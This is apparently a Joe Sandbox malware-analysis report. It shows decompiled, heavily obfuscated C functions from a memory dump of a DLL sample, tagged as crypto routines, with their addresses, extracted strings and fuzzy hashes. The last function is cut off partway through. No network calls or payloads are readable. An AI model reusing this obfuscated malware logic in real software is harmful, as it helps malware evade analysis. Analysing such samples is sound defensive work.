Uniqueness Score: -1.00%

Function 02B3F369, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B3F369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E02B407F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E02B4BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E02B407F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E02B407F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E02B407F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E02B4BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E02B407F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}

0x02b3f369
0x02b3f36c
0x02b3f380
0x02b3f388
0x02b3f38a
0x02b3f38c
0x02b3f38e
0x02b3f38f
0x02b3f390
0x02b3f39c
0x02b3f3a1
0x02b3f3a7
0x02b3f3b4
0x02b3f3b7
0x02b3f3bb
0x02b3f3c3
0x02b3f3cb
0x02b3f3db
0x02b3f3df
0x02b3f3e7
0x02b3f3ef
0x02b3f3fb
0x02b3f400
0x02b3f406
0x02b3f40e
0x02b3f416
0x02b3f41e
0x02b3f426
0x02b3f42e
0x02b3f436
0x02b3f43f
0x02b3f444
0x02b3f44a
0x02b3f452
0x02b3f462
0x02b3f46a
0x02b3f472
0x02b3f477
0x02b3f47f
0x02b3f487
0x02b3f48f
0x02b3f497
0x02b3f49f
0x02b3f4a4
0x02b3f4ac
0x02b3f4b4
0x02b3f4c1
0x02b3f4c2
0x02b3f4c6
0x02b3f4ce
0x02b3f4d6
0x02b3f4e4
0x02b3f4ea
0x02b3f4ef
0x02b3f4f7
0x02b3f4ff
0x02b3f504
0x02b3f50c
0x02b3f514
0x02b3f51c
0x02b3f524
0x02b3f52c
0x02b3f534
0x02b3f539
0x02b3f541
0x02b3f549
0x02b3f551
0x02b3f559
0x02b3f561
0x02b3f569
0x02b3f571
0x02b3f579
0x02b3f581
0x02b3f589
0x02b3f591
0x02b3f599
0x02b3f5a7
0x02b3f5af
0x02b3f5b3
0x02b3f5bb
0x02b3f5c0
0x02b3f5c8
0x02b3f5d0
0x02b3f5d8
0x02b3f5e0
0x02b3f5ed
0x02b3f5f1
0x02b3f5f9
0x02b3f5f9
0x02b3f601
0x02b3f601
0x02b3f601
0x02b3f601
0x02b3f603
0x00000000
0x00000000
0x02b3f605
0x02b3f67d
0x00000000
0x02b3f607
0x02b3f60d
0x02b3f66b
0x02b3f66c
0x02b3f671
0x02b3f674
0x02b3f679
0x00000000
0x02b3f60f
0x02b3f615
0x02b3f71a
0x02b3f61b
0x02b3f621
0x02b3f651
0x02b3f652
0x02b3f657
0x02b3f65a
0x02b3f65f
0x00000000
0x02b3f623
0x02b3f629
0x00000000
0x02b3f62f
0x02b3f637
0x02b3f638
0x02b3f63d
0x02b3f640
0x02b3f645
0x00000000
0x02b3f645
0x02b3f629
0x02b3f621
0x02b3f615
0x02b3f60d
0x02b3f71d
0x02b3f725
0x02b3f725
0x02b3f687
0x02b3f6e1
0x02b3f6e2
0x02b3f6e7
0x02b3f6ea
0x02b3f6ef
0x00000000
0x02b3f689
0x02b3f68b
0x02b3f6c5
0x02b3f6ca
0x02b3f6cd
0x02b3f6d2
0x00000000
0x02b3f68d
0x02b3f693
0x00000000
0x02b3f695
0x02b3f69d
0x02b3f69e
0x02b3f6a3
0x02b3f6a6
0x02b3f6ab
0x00000000
0x02b3f6ab
0x02b3f693
0x02b3f68b
0x00000000
0x02b3f6f1
0x02b3f6f1
0x00000000

Strings

,>, xrefs: 02B3F42E
_3, xrefs: 02B3F48F
a?E, xrefs: 02B3F462
Uo>, xrefs: 02B3F571
rCx/, xrefs: 02B3F5D8
l0, xrefs: 02B3F599

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,>$Uo>$_3$a?E$l0$rCx/
API String ID: 0-1805074986
Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction ID: 27ae6013531b98541778a308b85d20f5d7f659e55f5d7fff1e1291a0062664a5
Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction Fuzzy Hash: 1C9132B29083419BC759CF25D48981FBBF1FBD5748F144A2DFA8A96260D7B6C908CB43

Uniqueness

Uniqueness Score: -1.00%

Function 02B48806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E02B48806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t155;
				void* _t171;
				void* _t173;
				void* _t176;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				void* _t188;
				signed int _t212;
				intOrPtr _t215;
				signed int* _t218;

				_t214 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t155);
				_v76 = 0x923182;
				_t218 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t215 = 0;
				_v68 = 0;
				_v64 = 0;
				_t188 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t182 = 0x46;
				_v120 = _v120 / _t182;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t183 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t183;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t184 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t184;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t185 = 0x59;
				_v136 = _v136 / _t185;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t188 != 0x2d570bf) {
						if(_t188 == 0x2e69388) {
							_t173 = E02B52BF0(_v80,  &_v60, _v92, _v116, _t214 + 0xc);
							_t218 =  &(_t218[3]);
							__eflags = _t173;
							if(__eflags != 0) {
								_t188 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t188 == 0xa1356c9) {
								_t176 = E02B52BF0(_v140,  &_v60, _v84, _v124, _t214 + 0x48);
								_t218 =  &(_t218[3]);
								__eflags = _t176;
								if(__eflags != 0) {
									_t188 = 0x2e69388;
									continue;
								}
							} else {
								if(_t188 == 0xd5f0997) {
									__eflags = E02B49D3E( &_v60, _v88, __eflags, _v112, _t214);
									_t215 =  !=  ? 1 : _t215;
								} else {
									if(_t188 == 0xe0c62fa) {
										_t188 = 0xe1d6fcd;
										continue;
									} else {
										if(_t188 == 0xe1d6fcd) {
											_push(_v100);
											_t212 = _v120;
											_push( &_v60);
											E02B322A6( *[fs:esp+0xa4], _t212);
											_t218 =  &(_t218[2]);
											_t188 = 0xa1356c9;
											continue;
										} else {
											if(_t188 != 0xed0c1fc) {
												goto L20;
											} else {
												_t181 = E02B52BF0(_v132,  &_v60, _v128, _v108, _t214 + 0x1c);
												_t218 =  &(_t218[3]);
												if(_t181 != 0) {
													_t188 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						return _t215;
					}
					_t171 = E02B52BF0(_v136,  &_v60, _v96, _v104, _t214 + 0x3c);
					_t218 =  &(_t218[3]);
					__eflags = _t171;
					if(__eflags == 0) {
						_t188 = 0x63acd9;
						goto L20;
					} else {
						_t188 = 0xd5f0997;
						continue;
					}
					goto L23;
					L20:
					__eflags = _t188 - 0x63acd9;
				} while (__eflags != 0);
				goto L23;
			}

0x02b48810
0x02b48817
0x02b48818
0x02b4881f
0x02b48820
0x02b48821
0x02b48826
0x02b4882e
0x02b48831
0x02b48839
0x02b4883b
0x02b48841
0x02b48845
0x02b4884a
0x02b48858
0x02b4885d
0x02b48863
0x02b48868
0x02b48870
0x02b4887d
0x02b48880
0x02b48884
0x02b4888c
0x02b48899
0x02b4889d
0x02b488aa
0x02b488ae
0x02b488b6
0x02b488be
0x02b488c6
0x02b488ce
0x02b488d6
0x02b488de
0x02b488ee
0x02b488f2
0x02b488fa
0x02b48902
0x02b4890a
0x02b48912
0x02b4891a
0x02b48922
0x02b4892a
0x02b48932
0x02b48937
0x02b4893f
0x02b48947
0x02b4894f
0x02b48957
0x02b48964
0x02b48965
0x02b48969
0x02b48971
0x02b4897f
0x02b48983
0x02b4898b
0x02b48993
0x02b4899b
0x02b489a8
0x02b489ac
0x02b489b4
0x02b489c4
0x02b489d1
0x02b489d5
0x02b489d9
0x02b489de
0x02b489e6
0x02b489ee
0x02b489f6
0x02b489fe
0x02b48a06
0x02b48a0b
0x02b48a13
0x02b48a1b
0x02b48a23
0x02b48a2b
0x02b48a33
0x02b48a37
0x02b48a3f
0x02b48a47
0x02b48a47
0x02b48a51
0x02b48b22
0x02b48b27
0x02b48b2a
0x02b48b2c
0x02b48b2e
0x00000000
0x02b48b2e
0x02b48a57
0x02b48a5d
0x02b48af7
0x02b48afc
0x02b48aff
0x02b48b01
0x02b48b07
0x00000000
0x02b48b07
0x02b48a63
0x02b48a69
0x02b48b8c
0x02b48b8e
0x02b48a6f
0x02b48a75
0x02b48ad9
0x00000000
0x02b48a77
0x02b48a7d
0x02b48ab3
0x02b48ab7
0x02b48ac6
0x02b48ac7
0x02b48acc
0x02b48acf
0x00000000
0x02b48a7f
0x02b48a85
0x00000000
0x02b48a8b
0x02b48a9f
0x02b48aa4
0x02b48aa9
0x02b48aaf
0x00000000
0x02b48aaf
0x02b48aa9
0x02b48a85
0x02b48a7d
0x02b48a75
0x02b48a69
0x02b48a5d
0x02b48b92
0x02b48b9d
0x02b48b9d
0x02b48b4c
0x02b48b51
0x02b48b54
0x02b48b56
0x02b48b62
0x00000000
0x02b48b58
0x02b48b58
0x00000000
0x02b48b58
0x00000000
0x02b48b67
0x02b48b67
0x02b48b67
0x00000000

Strings

\:, xrefs: 02B48937
d%, xrefs: 02B4898B
Eh}, xrefs: 02B488FA
$P, xrefs: 02B4880E
>_), xrefs: 02B48912
i*, xrefs: 02B488CE

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: 098a6c34cbb4364aa0b054a286ec462e88e3a9e1c1c0ee6fb5b6de3cb391406f
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: 939164B11083419FD718CF21D98592BBBF2EBC4708F00895EF59A96260D7B6CA09DF83

Uniqueness

Uniqueness Score: -1.00%

Function 02B3BFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02B3BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E02B4FE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E02B51538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E02B4C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E02B545CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x02b3bfc2
0x02b3bfc9
0x02b3bfcd
0x02b3bfcf
0x02b3bfd0
0x02b3bfd2
0x02b3bfd7
0x02b3bfdf
0x02b3bfe2
0x02b3bfec
0x02b3bff4
0x02b3bff6
0x02b3bffe
0x02b3c003
0x02b3c00b
0x02b3c013
0x02b3c01b
0x02b3c029
0x02b3c02e
0x02b3c034
0x02b3c03c
0x02b3c044
0x02b3c04c
0x02b3c054
0x02b3c05c
0x02b3c064
0x02b3c069
0x02b3c071
0x02b3c079
0x02b3c07d
0x02b3c07e
0x02b3c080
0x02b3c084
0x02b3c08c
0x02b3c094
0x02b3c09c
0x02b3c0a4
0x02b3c0ac
0x02b3c0b1
0x02b3c0b9
0x02b3c0c1
0x02b3c0c9
0x02b3c0d6
0x02b3c0da
0x02b3c0e2
0x02b3c0ea
0x02b3c0fa
0x02b3c102
0x02b3c10a
0x02b3c112
0x02b3c11a
0x02b3c122
0x02b3c12a
0x02b3c132
0x02b3c13a
0x02b3c142
0x02b3c14a
0x02b3c152
0x02b3c15a
0x02b3c162
0x02b3c167
0x02b3c16b
0x02b3c173
0x02b3c17b
0x02b3c180
0x02b3c188
0x02b3c190
0x02b3c198
0x02b3c1a0
0x02b3c1a4
0x02b3c1ac
0x02b3c1b4
0x02b3c1bc
0x02b3c1bc
0x02b3c1ca
0x02b3c27c
0x02b3c1d0
0x02b3c1d6
0x02b3c208
0x02b3c20d
0x02b3c210
0x02b3c212
0x00000000
0x02b3c1d8
0x02b3c1de
0x00000000
0x02b3c1e4
0x02b3c1e4
0x00000000
0x02b3c1e4
0x02b3c1de
0x02b3c1d6
0x02b3c282
0x02b3c28b
0x02b3c28b
0x02b3c23f
0x02b3c247
0x02b3c24c
0x02b3c24e
0x02b3c254
0x02b3c260
0x00000000
0x02b3c256
0x02b3c256
0x00000000
0x02b3c256
0x00000000
0x02b3c265
0x02b3c265
0x00000000

Strings

Te;, xrefs: 02B3C122
j-N, xrefs: 02B3C054
3$, xrefs: 02B3C05C
jA, xrefs: 02B3C15A
ODg, xrefs: 02B3C0C1
/c, xrefs: 02B3C11A

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: 0546f6ef98f908a1725dab9bd2e72ccdd17c48c4a276bbd08dfc11c43056c45c
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: DD6143710183409FC3A9CFA5D88A81BBFE1FBC5718F405A1DF6D696260C3B58A59CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02B42142, Relevance: 6.6, Strings: 5, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B42142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_push("true");
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_pop(_t394);
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
